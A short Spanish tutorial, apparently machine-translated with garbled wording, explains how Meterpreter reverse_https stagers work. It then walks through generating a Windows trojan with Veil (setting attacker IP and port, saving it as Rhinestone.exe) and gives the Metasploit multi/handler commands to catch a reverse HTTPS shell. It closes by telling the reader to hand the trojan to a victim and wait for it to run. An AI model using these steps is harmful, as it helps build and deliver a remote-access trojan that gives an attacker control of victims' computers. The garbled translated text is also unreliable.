Los caballos de diligencia shellcode-less, teatralizadores Meterpreter "puros" en cierto modo similares a los caballos de diligencia reverse_tcp tradicionales.
Reverse_https Meterpreter [s] teatralizadores son en realidad un poco más simple que reverse_tcp. La idea general es la misma: el controlador sirve un archivo dll. Que el cliente luego inyecta mediante el VirtualAlloc / etc. metodología. Sin embargo, en lugar de tener que parchear el. Dll a nosotros mismos con las instrucciones de montaje y el descriptor de fichero de un conector, el manejador de Metasploit parchea el agente de usuario, método de transporte (http / https), url y expiración / tiempo de espera de la comunicación de forma dinámica, ya que sirve el Meterpreter.
Configuramos los parametros la ip atacante y el puerto de escucha
Colocamos un nombre al troyano y nos preguntara como crear el payload la opcion 1 por defecto
Se guardara el troyano en la siguiente ruta /root/veil-output/compiled/Rhinestone.exe
Creamos la sesion de handler pero esta ves utilizando un payload de reverce https
Cita:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_httpsmsf exploit(handler) > set ExitOnSession falsemsf exploit(handler) > set LHOST (IP)msf exploit(handler) > set LPORT 3232msf exploit(handler) > exploit -j
Solo hay que pasarle el troyano a la victima y esperar que lo ejecute y tendremos la sesión de meterpreter.